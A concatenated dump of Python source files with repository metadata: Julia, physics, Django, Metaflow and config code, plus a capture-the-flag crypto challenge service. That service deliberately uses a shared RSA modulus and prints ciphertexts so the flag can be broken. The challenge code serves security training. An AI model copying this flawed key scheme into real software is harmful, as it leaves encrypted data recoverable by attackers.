plot_a_waveform_and_spectrum(wav_file, title) | 32.166667 | 115 | 0.698187 | 532 | 3,860 | 4.838346 | 0.291353 | 0.021756 | 0.020202 | 0.018648 | 0.063714 | 0.045066 | 0.035742 | 0.014763 | 0 | 0 | 0 | 0.01027 | 0.192746 | 3,860 | 120 | 116 | 32.166667 | 0.815789 | 0.124611 | 0 | 0.074074 | 0 | 0 | 0.08848 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.074074 | false | 0 | 0.08642 | 0 | 0.209877 | 0.061728 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2cd56853a7874d3f69f6d5cadacbd3f01499519b | 1,118 | py | Python | src/julia/tests/test_sysimage.py | grahamgill/pyjulia | 15504cddfefb477048aa09c17e9ed6fde65ca037 | [
"MIT"
] | null | null | null | src/julia/tests/test_sysimage.py | grahamgill/pyjulia | 15504cddfefb477048aa09c17e9ed6fde65ca037 | [
"MIT"
] | null | null | null | src/julia/tests/test_sysimage.py | grahamgill/pyjulia | 15504cddfefb477048aa09c17e9ed6fde65ca037 | [
"MIT"
] | null | null | null | import pytest
from julia.sysimage import build_sysimage
from .test_compatible_exe import runcode
from .utils import only_in_ci, skip_in_appveyor
@pytest.mark.julia
@only_in_ci
@skip_in_appveyor # Avoid "LVM ERROR: out of memory"
def test_build_and_load(tmpdir, juliainfo):
if juliainfo.version_info < (1, 3, 1):
pytest.skip("Julia < 1.3.1 is not supported")
sysimage_path = str(tmpdir.join("sys.so"))
build_sysimage(sysimage_path, julia=juliainfo.julia)
very_random_string = "4903dc03-950f-4a54-98a3-c57a354b62df"
proc = runcode(
"""
from julia.api import Julia
sysimage_path = {sysimage_path!r}
very_random_string = {very_random_string!r}
jl = Julia(
debug=True,
sysimage=sysimage_path,
runtime={juliainfo.julia!r},
)
from julia import Main
Main.println(very_random_string)
""".format(
juliainfo=juliainfo,
sysimage_path=sysimage_path,
very_random_string=very_random_string,
)
)
assert very_random_string in proc.stdout
| 27.268293 | 63 | 0.661896 | 142 | 1,118 | 4.950704 | 0.429577 | 0.119488 | 0.159317 | 0.034139 | 0.153627 | 0.153627 | 0 | 0 | 0 | 0 | 0 | 0.033453 | 0.251342 | 1,118 | 40 | 64 | 27.95 | 0.806452 | 0.028623 | 0 | 0 | 0 | 0 | 0.098093 | 0.049046 | 0 | 0 | 0 | 0 | 0.047619 | 1 | 0.047619 | false | 0 | 0.190476 | 0 | 0.238095 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2cd5f072b64decf0deefb73f0c810cfa919e68d4 | 1,717 | py | Python | tasks/crypto/warmer/service/warmer.py | keltecc/ctfcup-2020-quals | a8d3702b3449c4e459e80aea781bed85175fee02 | [
"MIT"
] | null | null | null | tasks/crypto/warmer/service/warmer.py | keltecc/ctfcup-2020-quals | a8d3702b3449c4e459e80aea781bed85175fee02 | [
"MIT"
] | null | null | null | tasks/crypto/warmer/service/warmer.py | keltecc/ctfcup-2020-quals | a8d3702b3449c4e459e80aea781bed85175fee02 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3.7
from gmpy2 import next_prime, gcdext
from random import getrandbits
class Cryptoanalyst:
def __init__(self, p, q):
self._n = p * q
self._phi = (p - 1) * (q - 1)
self._e, self._d = self.generate_key()
return
def generate_key(self):
bits = self._n.bit_length()
while True:
e = getrandbits(bits) % self._phi
g, d, _ = gcdext(e, self._phi)
if g == 1 and d.bit_length() == e.bit_length():
break
return e, d
def encrypt(self, plaintext):
return pow(plaintext, self._e, self._n)
def decrypt(self, ciphertext):
return pow(ciphertext, self._d, self._n)
def get_key(self):
return (self._n, self._e)
def secure_transmission(sender, receiver, secret):
print(f'> sender: hello')
print(f'> receiver: hello')
print(f'> sender: {sender.get_key()}')
print(f'> receiver: {receiver.get_key()}')
message1 = sender.encrypt(secret)
print(f'> sender: {message1}')
message2 = receiver.encrypt(message1)
print(f'> receiver: {message2}')
message3 = sender.decrypt(message2)
print(f'> sender: {message3}')
message4 = receiver.decrypt(message3)
assert message4 == secret
return
def main():
bits = 1024
p, q = map(int, map(next_prime, map(getrandbits, [bits] * 2)))
sender = Cryptoanalyst(p, q)
receiver = Cryptoanalyst(p, q)
with open('flag.txt', 'r') as file:
flag = file.read().strip()
message = int.from_bytes(flag.encode(), 'big')
secure_transmission(sender, receiver, message)
return
if __name__ == '__main__':
main()
| 22.893333 | 66 | 0.589983 | 216 | 1,717 | 4.509259 | 0.347222 | 0.043121 | 0.049281 | 0.065708 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0176 | 0.271986 | 1,717 | 74 | 67 | 23.202703 | 0.7616 | 0.013395 | 0 | 0.0625 | 0 | 0 | 0.102776 | 0 | 0 | 0 | 0 | 0 | 0.020833 | 1 | 0.145833 | false | 0 | 0.041667 | 0.0625 | 0.354167 | 0.145833 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2cdc2b87699ba37eac9144773d8c0c6af7b08a1a | 6,302 | py | Python | demos/backtrack_sys_id.py | kracon7/lcp-physics | 463d9602350b854464a027b2c57faae412fa2691 | [
"Apache-2.0"
] | 1 | 2022-01-25T09:13:10.000Z | 2022-01-25T09:13:10.000Z | demos/backtrack_sys_id.py | kracon7/lcp-physics | 463d9602350b854464a027b2c57faae412fa2691 | [
"Apache-2.0"
] | null | null | null | demos/backtrack_sys_id.py | kracon7/lcp-physics | 463d9602350b854464a027b2c57faae412fa2691 | [
"Apache-2.0"
] | null | null | null | import os
import sys
import time
import math
from math import sin, cos
import cv2
import pygame
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
import torch
from torch.autograd import Variable
from lcp_physics.physics.bodies import Circle, Rect, Hull, Composite
from lcp_physics.physics.constraints import TotalConstraint, FixedJoint
from lcp_physics.physics.forces import ExternalForce, Gravity, vert_impulse, hor_impulse
from lcp_physics.physics.utils import Defaults, plot, reset_screen, Recorder
from lcp_physics.physics.world import World, run_world
from lcp_physics.physics.action import build_mesh, random_action
from lcp_physics.physics.sim import SimSingle
TIME = 2
DT = Defaults.DT
DEVICE = Defaults.DEVICE
ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
np.random.seed(10)
torch.random.manual_seed(0)
def plot_mass_error(mask, m1, m2, save_path=None):
err = np.zeros_like(mask).astype('float')
err[mask] = m1 - m2
ax = plt.subplot()
im = ax.imshow(err, vmin=-0.15, vmax=0.15, cmap='plasma')
# create an axes on the right side of ax. The width of cax will be 5%
# of ax and the padding between cax and ax will be fixed at 0.05 inch.
divider = make_axes_locatable(ax)
cax = divider.append_axes("right", size="5%", pad=0.05)
plt.colorbar(im, cax=cax)
if save_path:
plt.savefig(save_path)
plt.clf()
ax.cla()
def sys_id_demo(screen):
if screen is not None:
import pygame
background = pygame.Surface(screen.get_size())
background = background.convert()
background.fill((255, 255, 255))
obj_name = 'drill'
mass_img_path = os.path.join(ROOT, 'fig/%s_mass.png'%obj_name)
bottom_fric_img_path = os.path.join(ROOT, 'fig/%s_fric.png'%obj_name)
sim = SimSingle.from_img(mass_img_path, bottom_fric_img_path, particle_radius=10,
hand_radius=10)
sim.bottom_fric_est = sim.bottom_fric_gt
sim.action_mag = 20
sim.force_time = 0.3
# sim.mass_est = 0.09 * torch.ones(sim.N).to(DEVICE)
# sim.mass_est = Variable(sim.mass_est, requires_grad=True)
gt_mean = sim.mass_gt.mean()
sim.mass_est = 0.04 * torch.rand(sim.N) - 0.02 + gt_mean
sim.mass_est.requires_grad = True
max_iter = 20
dist_hist, new_dist_hist = [], []
mass_err_hist = []
last_dist = 1e10
for i in range(max_iter):
plot_mass_error(sim.mask, sim.mass_gt,
sim.mass_est.detach().numpy(), 'tmp/mass_err_%03d.png'%i)
################# Compute the gradient direction ###################
rotation, offset = torch.tensor([0]).type(Defaults.DTYPE), torch.tensor([[500, 300]]).type(Defaults.DTYPE)
composite_body_gt = sim.init_composite_object(
sim.particle_pos0,
sim.particle_radius,
sim.mass_gt,
sim.bottom_fric_gt,
rotation=rotation,
offset=offset)
action = sim.sample_action(composite_body_gt)
world = sim.make_world(composite_body_gt, action, verbose=-1)
recorder = None
# recorder = Recorder(DT, screen)
run_world(world, run_time=TIME, screen=screen, recorder=recorder)
X1 = composite_body_gt.get_particle_pos()
composite_body = sim.init_composite_object(
sim.particle_pos0,
sim.particle_radius,
sim.mass_est,
sim.bottom_fric_gt,
rotation=rotation,
offset=offset)
world = sim.make_world(composite_body, action, verbose=-1)
run_world(world, run_time=TIME, screen=screen, recorder=recorder)
X2 = composite_body.get_particle_pos()
dist = torch.sum(torch.norm(X1 - X2, dim=1))
dist.backward()
grad = torch.nan_to_num(sim.mass_est.grad.data)
print(grad)
################# Backtracking line search ###################
cm = - 0.5 * torch.norm(grad)**2
alpha, rho = 0.01 / torch.abs(grad).max(), 0.6
count = 1
while True:
mass_est = torch.clamp(sim.mass_est.data - alpha * grad, min=1e-5)
composite_body = sim.init_composite_object(
sim.particle_pos0,
sim.particle_radius,
mass_est,
sim.bottom_fric_gt,
rotation=rotation,
offset=offset)
world = sim.make_world(composite_body, action, verbose=-1)
run_world(world, run_time=TIME, screen=screen, recorder=recorder)
X2 = composite_body.get_particle_pos()
new_dist = torch.sum(torch.norm(X1 - X2, dim=1))
if new_dist - dist > alpha * cm:
alpha *= rho
else:
break
if count >= 3:
break
count += 1
################# Update mass_est ###################
learning_rate = alpha
sim.mass_est = torch.clamp(sim.mass_est.data - learning_rate * grad, min=1e-5)
sim.mass_est.requires_grad=True
print(i, '/', max_iter, dist.data.item() / sim.N)
print('=======\n\n')
dist_hist.append(dist / sim.N)
new_dist_hist.append(new_dist / sim.N)
reset_screen(screen)
fig, ax = plt.subplots(1, 1)
ax.plot(dist_hist, color='r')
ax.plot(new_dist_hist, color='b')
plt.show()
if __name__ == '__main__':
if len(sys.argv) > 1 and sys.argv[1] == '-nd':
# Run without displaying
screen = None
else:
pygame.init()
width, height = 1000, 600
screen = pygame.display.set_mode((width, height), pygame.DOUBLEBUF)
screen.set_alpha(None)
pygame.display.set_caption('2D Engine')
reset_screen(screen)
sys_id_demo(screen) | 36.218391 | 114 | 0.576642 | 803 | 6,302 | 4.313823 | 0.298879 | 0.030312 | 0.034642 | 0.042436 | 0.286663 | 0.265878 | 0.2347 | 0.2347 | 0.189954 | 0.17321 | 0 | 0.024318 | 0.308315 | 6,302 | 174 | 115 | 36.218391 | 0.77036 | 0.060457 | 0 | 0.253731 | 0 | 0 | 0.018598 | 0.003616 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014925 | false | 0 | 0.149254 | 0 | 0.164179 | 0.022388 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2cddba26a9f7ebff1e43f765570e7d69aa6a4da8 | 1,525 | py | Python | django_toolset/templatetags/custom_tags.py | codezeus/django-helpers | a28cc19e32cf41130e848c268d26c1858a7cf26a | [
"MIT"
] | null | null | null | django_toolset/templatetags/custom_tags.py | codezeus/django-helpers | a28cc19e32cf41130e848c268d26c1858a7cf26a | [
"MIT"
] | null | null | null | django_toolset/templatetags/custom_tags.py | codezeus/django-helpers | a28cc19e32cf41130e848c268d26c1858a7cf26a | [
"MIT"
] | null | null | null | import re
from django import template
from django.core.urlresolvers import reverse, NoReverseMatch
register = template.Library()
@register.simple_tag(takes_context=True)
def active(context, pattern_or_urlname, class_name='active', *args, **kwargs):
"""Based on a URL Pattern or name, determine if it is the current page.
This is useful if you're creating a navigation component and want to give
the active URL a specific class for UI purposes. It will accept a named
URL or a regex pattern. If you have a URL which accepts args or kwargs then
you may pass them into the tag and they will be picked up for matching as
well.
Usage:
{% load custom_tags %}
<li class="nav-home {% active 'url-name' %}">
<a href="#">Home</a>
</li>
OR
<li class="nav-home {% active '^/regex/' %}">
<a href="#">Home</a>
</li>
OR
<li class="nav-home {% active 'url-name' class_name='current' %}">
<a href="#">Home</a>
</li>
OR
<li class="nav-home {% active 'url-name' username=user.username %}">
<a href="#">Home</a>
</li>
"""
request = context.dicts[1].get('request')
try:
pattern = '^%s$' % reverse(pattern_or_urlname, args=args,
kwargs=kwargs)
except NoReverseMatch:
pattern = pattern_or_urlname
if request and re.search(pattern, request.path):
return class_name
return ''
| 25.847458 | 79 | 0.591475 | 203 | 1,525 | 4.384236 | 0.438424 | 0.040449 | 0.044944 | 0.062921 | 0.174157 | 0.160674 | 0.160674 | 0.130337 | 0.130337 | 0.130337 | 0 | 0.000923 | 0.28918 | 1,525 | 58 | 80 | 26.293103 | 0.820111 | 0.547541 | 0 | 0 | 0 | 0 | 0.028862 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.2 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2cdf95764c7d48293946ebbedd290b920fcacdcb | 2,768 | py | Python | configs/PINet/baseline_tusimple.py | masszhou/lane_detector | e28fe4adbd4c804e45c9bd86743739196bc30105 | [
"MIT"
] | 4 | 2020-10-07T03:31:42.000Z | 2022-03-23T04:10:56.000Z | configs/PINet/baseline_tusimple.py | masszhou/lane_detector | e28fe4adbd4c804e45c9bd86743739196bc30105 | [
"MIT"
] | null | null | null | configs/PINet/baseline_tusimple.py | masszhou/lane_detector | e28fe4adbd4c804e45c9bd86743739196bc30105 | [
"MIT"
] | 1 | 2020-11-16T07:13:53.000Z | 2020-11-16T07:13:53.000Z | # use with vars(Parameters()) if need dict
class Parameters:
def __init__(self):
# train setup
self.batch_size = 8
self.num_epochs = 700
self.learning_rate = 0.0001
self.weight_decay = 0
self.l_rate = 0.0001
self.weight_decay = 0
self.save_path = "tmp/"
self.model_path = "tmp/"
self.validate_epochs = 10
# data loader setup
self.dataset_name = "tusimple"
self.flip_ratio = 0.4
self.translation_ratio = 0.6
self.rotate_ratio = 0.6
self.noise_ratio = 0.4
self.intensity_ratio = 0.4
self.shadow_ratio = 0.6
self.scaling_ratio = 0.2
self.train_root_url = "/media/zzhou/data-tusimple/lane_detection/train_set/"
self.train_json_file = ['label_data_0313.json', 'label_data_0531.json', 'label_data_0601.json']
self.val_root_url = "/media/zzhou/data-tusimple/lane_detection/test_set/"
self.val_json_file = ["test_tasks_0627.json"]
self.test_root_url = "/media/zzhou/data-tusimple/lane_detection/test_set/"
self.test_json_file = ["test_tasks_0627.json"]
# anchor setup
self.x_size = 512
self.y_size = 256
self.resize_ratio = 8
self.grid_x = self.x_size // self.resize_ratio # 64
self.grid_y = self.y_size // self.resize_ratio # 32
self.feature_size = 4 # feature size in similarity matrix in instance layer
# loss function
self.K1 = 1.0
self.K2 = 2.0
self.constant_offset = 1.0
self.constant_exist = 1.0 # 2
self.constant_nonexist = 1.0 # 1.5 last 200epoch
self.constant_angle = 1.0
self.constant_similarity = 1.0
self.constant_alpha = 1.0 # in SGPN paper, they increase this factor by 2 every 5 epochs
self.constant_beta = 1.0
self.constant_gamma = 1.0
self.constant_back = 1.0
self.constant_l = 1.0
self.constant_lane_loss = 1.0 # 1.5 last 200epoch
self.constant_instance_loss = 1.0
# post processsing
self.threshold_confidence = 0.81
self.threshold_instance = 0.22
# self.grid_location = np.zeros((self.grid_y, self.grid_x, 2)) # anchor template
# for y in range(self.grid_y):
# for x in range(self.grid_x):
# self.grid_location[y][x][0] = x
# self.grid_location[y][x][1] = y
# misc
self.last_model_path = "tmp/"
self.color = [(0, 0, 0), (255, 0, 0), (0, 255, 0), (0, 0, 255), (255, 255, 0), (255, 0, 255), (0, 255, 255),
(255, 255, 255), (100, 255, 0), (100, 0, 255), (255, 100, 0), (0, 100, 255), (255, 0, 100),
(0, 255, 100)]
| 40.115942 | 116 | 0.584538 | 405 | 2,768 | 3.787654 | 0.298765 | 0.016949 | 0.031291 | 0.063885 | 0.264016 | 0.239896 | 0.182529 | 0.182529 | 0.0691 | 0.0691 | 0 | 0.106022 | 0.298049 | 2,768 | 68 | 117 | 40.705882 | 0.683479 | 0.179552 | 0 | 0.039216 | 0 | 0 | 0.121778 | 0.068444 | 0 | 0 | 0 | 0 | 0 | 1 | 0.019608 | false | 0 | 0 | 0 | 0.039216 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2ce2120db3a3e4b8a38a101f55fe4d120b1ad93e | 10,175 | py | Python | metaflow/datastore/local.py | vamagithub/metaflow | 8126e80004b0042a0eb148332bfac11c850ea02b | [
"Apache-2.0"
] | null | null | null | metaflow/datastore/local.py | vamagithub/metaflow | 8126e80004b0042a0eb148332bfac11c850ea02b | [
"Apache-2.0"
] | null | null | null | metaflow/datastore/local.py | vamagithub/metaflow | 8126e80004b0042a0eb148332bfac11c850ea02b | [
"Apache-2.0"
] | null | null | null | """
Local storage
Store data under .metaflow/ in the cwd
"""
import os
import json
import gzip
from tempfile import NamedTemporaryFile
from metaflow.util import Path
from metaflow.metaflow_config import DATASTORE_LOCAL_DIR, DATASTORE_SYSROOT_LOCAL
from .datastore import MetaflowDataStore, DataException, only_if_not_done
from ..metadata import MetaDatum
class LocalDataStore(MetaflowDataStore):
TYPE = 'local'
METADATA_DIR = '_meta'
def _makedirs(self, path):
try:
os.makedirs(path)
except OSError as x:
if x.errno == 17:
return
else:
raise
def object_path(self, sha):
root = os.path.join(self.data_root, sha[:2])
return os.path.join(root, sha)
@classmethod
def get_datastore_root_from_config(cls, echo, create_on_absent=True):
# Compute path for DATASTORE_SYSROOT_LOCAL
result = DATASTORE_SYSROOT_LOCAL
if result is None:
try:
# Python2
current_path = os.getcwdu()
except: # noqa E722
current_path = os.getcwd()
check_dir = os.path.join(current_path, DATASTORE_LOCAL_DIR)
check_dir = os.path.realpath(check_dir)
orig_path = check_dir
top_level_reached = False
while not os.path.isdir(check_dir):
new_path = os.path.dirname(current_path)
if new_path == current_path:
top_level_reached = True
break # We are no longer making upward progress
current_path = new_path
check_dir = os.path.join(current_path, DATASTORE_LOCAL_DIR)
if top_level_reached:
if create_on_absent:
# Could not find any directory to use so create a new one
echo('Creating local datastore in current directory (%s)' % orig_path,
fg='magenta', bold=True)
os.mkdir(orig_path)
result = orig_path
else:
return None
else:
result = check_dir
else:
result = os.path.join(result, DATASTORE_LOCAL_DIR)
return result
@classmethod
def get_latest_tasks(cls,
flow_name,
run_id=None,
steps=None,
pathspecs=None):
run_prefix = cls.make_path(flow_name, run_id)
data_blobs = []
if os.path.exists(run_prefix):
if steps is None:
steps = [s for s in os.listdir(run_prefix) if s != cls.METADATA_DIR]
if pathspecs is None:
task_prefixes = []
for step in steps:
step_prefix = cls.make_path(flow_name, run_id, step)
for task in os.listdir(step_prefix):
if task == cls.METADATA_DIR:
continue
task_prefixes.append(
cls.make_path(flow_name, run_id, step, task))
else:
task_prefixes = [cls.make_path(flow_name, pathspec)
for pathspec in pathspecs]
for task_prefix in task_prefixes:
step, task = task_prefix.split('/')[-2:]
# Sort the file listing to iterate in increasing order of
# attempts.
latest_data_path = None
latest_attempt = None
latest_done_attempt = None
for fname in sorted(os.listdir(task_prefix)):
if cls.is_done_filename(fname):
_, attempt = cls.parse_filename(fname)
latest_done_attempt = attempt
# Read the corresponding metadata file.
meta_fname = \
cls.get_metadata_filename_for_attempt(attempt)
latest_data_path = os.path.join(task_prefix, meta_fname)
elif cls.is_attempt_filename(fname):
_, attempt = cls.parse_filename(fname)
latest_attempt = attempt
# Only read the metadata if the latest attempt is also done.
if latest_done_attempt is not None and\
latest_done_attempt == latest_attempt:
with open(latest_data_path) as f:
data_blobs.append((step, task, attempt, f.read()))
return data_blobs
else:
raise DataException("Couldn't find data at %s" % run_prefix)
@classmethod
def get_artifacts(cls, artifacts_to_prefetch):
artifact_list = []
for path in artifacts_to_prefetch:
sha = path.split('/')[-1]
artifact_list.append((sha,
cls.decode_gzip_data(path)))
return artifact_list
@only_if_not_done
def save_logs(self, logsource, stream_data):
"""
Save log files for multiple streams, represented as
as a list of (stream, bytes) or (stream, Path) tuples.
"""
for stream, data in stream_data:
if isinstance(data, Path):
with open(str(data), 'rb') as f:
data = f.read()
path = self.get_log_location(logsource, stream)
with open(path + '.tmp', 'wb') as f:
f.write(data)
os.rename(path + '.tmp', path)
def _read_file_or_empty(self, path):
if os.path.exists(path):
with open(path, 'rb') as f:
return f.read()
else:
return b''
def load_log_legacy(self, stream, attempt_override=None):
"""
Load old-style, pre-mflog, log file represented as a bytes object.
"""
f = self.filename_with_attempt_prefix('%s.log' % stream,
attempt_override if attempt_override is not None
else self.attempt)
return self._read_file_or_empty(os.path.join(self.root, f))
def load_logs(self, logsources, stream, attempt_override=None):
paths = [self.get_log_location(source, stream, attempt_override)
for source in logsources]
return list(zip(logsources, map(self._read_file_or_empty, paths)))
@only_if_not_done
def save_metadata(self, name, metadata):
"""
Save a task-specific metadata dictionary as JSON.
"""
self._makedirs(self.root)
filename = self.filename_with_attempt_prefix('%s.json' % name,
self.attempt)
path = os.path.join(self.root, filename)
with open(path + '.tmp', 'w') as f:
json.dump(metadata, f)
os.rename(path + '.tmp', path)
def load_metadata(self, name):
"""
Load a task-specific metadata dictionary as JSON.
"""
filename = self.filename_with_attempt_prefix('%s.json' % name,
self.attempt)
path = os.path.join(self.root, filename)
with open(path) as f:
return json.load(f)
def has_metadata(self, name, with_attempt=True):
attempt = self.attempt if with_attempt else None
filename = self.filename_with_attempt_prefix('%s.json' % name, attempt)
path = os.path.join(self.root, filename)
return os.path.exists(path)
@only_if_not_done
def save_data(self, sha, transformable_object):
"""
Save a content-addressed data blob if it doesn't exist already.
"""
path = self.object_path(sha)
if not os.path.exists(path):
self._makedirs(os.path.dirname(path))
# NOTE multiple tasks may try to save an object with the
# same sha concurrently, hence we need to use a proper tmp
# file
with NamedTemporaryFile(dir=os.path.dirname(path),
prefix='blobtmp.',
delete=False) as tmp:
# NOTE compresslevel makes a huge difference. The default
# level of 9 can be impossibly slow.
with gzip.GzipFile(fileobj=tmp,
mode='wb',
compresslevel=3) as f:
f.write(transformable_object.current())
os.rename(tmp.name, path)
return path
def load_data(self, sha):
"""
Load a content-addressed data blob.
"""
with gzip.open(self.object_path(sha), 'rb') as f:
return f.read()
@only_if_not_done
def done(self):
"""
Write a marker indicating that datastore has finished writing to
this path.
"""
filename = self.get_done_filename_for_attempt(self.attempt)
path = os.path.join(self.root, filename)
self._makedirs(self.root)
try:
# this is for python2 compatibility.
# Python3 has open(mode='x').
fd = os.fdopen(os.open(path,
os.O_EXCL | os.O_WRONLY | os.O_CREAT),
'wb')
fd.close()
except OSError as x:
if x.errno == 17:
raise DataException('Path %s already exists. Try with a '
'different --run-id.' % path)
else:
raise
self.metadata.register_metadata(
self.run_id, self.step_name, self.task_id,
[MetaDatum(field='attempt-done', value=str(self.attempt), type='attempt-done', tags=[])])
self._is_done_set = True
def is_done(self):
"""
A flag indicating whether this datastore directory was closed
successfully with done().
"""
filename = self.get_done_filename_for_attempt(self.attempt)
path = os.path.join(self.root, filename)
return os.path.exists(path)
| 38.835878 | 101 | 0.542408 | 1,163 | 10,175 | 4.558899 | 0.216681 | 0.024896 | 0.022633 | 0.018484 | 0.224821 | 0.198227 | 0.166918 | 0.152961 | 0.108072 | 0.099396 | 0 | 0.00236 | 0.375332 | 10,175 | 261 | 102 | 38.984674 | 0.831812 | 0.116069 | 0 | 0.243523 | 0 | 0 | 0.026817 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.082902 | false | 0 | 0.041451 | 0 | 0.217617 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2ce2bb6332214e5787c31f91afe5d0568271109b | 505 | py | Python | scripts/json2yaml.py | hivdb/hiv-aapcnt | 4d4b1d268cfe48c5539abc48311c53a412b6e063 | [
"Unlicense"
] | null | null | null | scripts/json2yaml.py | hivdb/hiv-aapcnt | 4d4b1d268cfe48c5539abc48311c53a412b6e063 | [
"Unlicense"
] | 2 | 2020-02-20T19:24:36.000Z | 2020-08-28T18:48:52.000Z | scripts/json2yaml.py | hivdb/hiv-aapcnt | 4d4b1d268cfe48c5539abc48311c53a412b6e063 | [
"Unlicense"
] | 1 | 2020-01-27T22:08:18.000Z | 2020-01-27T22:08:18.000Z | #! /usr/bin/env python3
import os
import sys
import json
import yaml
BASEDIR = os.path.dirname(
os.path.dirname(os.path.abspath(__file__))
)
DATADIR = os.path.join(BASEDIR, 'data')
def json2yaml(jsonfile):
yamlfile = os.path.splitext(jsonfile)[0] + '.yml'
with open(jsonfile) as infile, open(yamlfile, 'w') as outfile:
data = json.load(infile)
yaml.dump(data, outfile)
def main():
filename = sys.argv[1]
json2yaml(filename)
if __name__ == '__main__':
main()
| 18.703704 | 66 | 0.661386 | 69 | 505 | 4.666667 | 0.550725 | 0.093168 | 0.080745 | 0.093168 | 0.099379 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012285 | 0.194059 | 505 | 26 | 67 | 19.423077 | 0.77887 | 0.043564 | 0 | 0 | 0 | 0 | 0.03527 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.222222 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2ce2bfabe9312aa121a1f7bd46b001dd3646a79a | 632 | py | Python | app/main.py | DrSnowbird/python-nonroot-docker | 761f6ab0dfed483b2a807e7d4b449f79e4dc83a9 | [
"Apache-2.0"
] | null | null | null | app/main.py | DrSnowbird/python-nonroot-docker | 761f6ab0dfed483b2a807e7d4b449f79e4dc83a9 | [
"Apache-2.0"
] | null | null | null | app/main.py | DrSnowbird/python-nonroot-docker | 761f6ab0dfed483b2a807e7d4b449f79e4dc83a9 | [
"Apache-2.0"
] | null | null | null |
import re
def myfunc(n):
return lambda a : a * n
def check(str, re_pattern):
pattern = re.compile(re_pattern)
# _matching the strings
if re.search(pattern, str):
print(f"str={str}, regex_pattern={re_pattern}: => Valid String")
else:
print(f"str={str}, regex_pattern={re_pattern}: => Invalid String")
if __name__ == '__main__':
# _driver code
re_pattern='^[1234]+$'
pattern = re.compile(re_pattern)
check('2134', re_pattern)
check('349', re_pattern)
mydoubler = myfunc(2)
mytripler = myfunc(3)
print(f"mydoubler(11)=> {mydoubler(11)}")
print(f"mydoubler(11)=> {mytripler(11)}")
| 22.571429 | 68 | 0.650316 | 88 | 632 | 4.443182 | 0.409091 | 0.184143 | 0.081841 | 0.092072 | 0.296675 | 0.168798 | 0.168798 | 0.168798 | 0 | 0 | 0 | 0.040619 | 0.181962 | 632 | 27 | 69 | 23.407407 | 0.715667 | 0.053797 | 0 | 0.111111 | 0 | 0 | 0.330523 | 0.091062 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.055556 | 0.055556 | 0.222222 | 0.222222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
2ce3881801186fd9d17c3809c4d389aeb65945e8 | 903 | py | Python | fossor/checks/raid_status.py | NeolithEra/fossor | d8dbdc40f2f16da601c317dfa74b83e3932c9bb3 | [
"BSD-2-Clause"
] | 165 | 2017-12-14T18:44:25.000Z | 2020-12-09T01:48:57.000Z | fossor/checks/raid_status.py | NeolithEra/fossor | d8dbdc40f2f16da601c317dfa74b83e3932c9bb3 | [
"BSD-2-Clause"
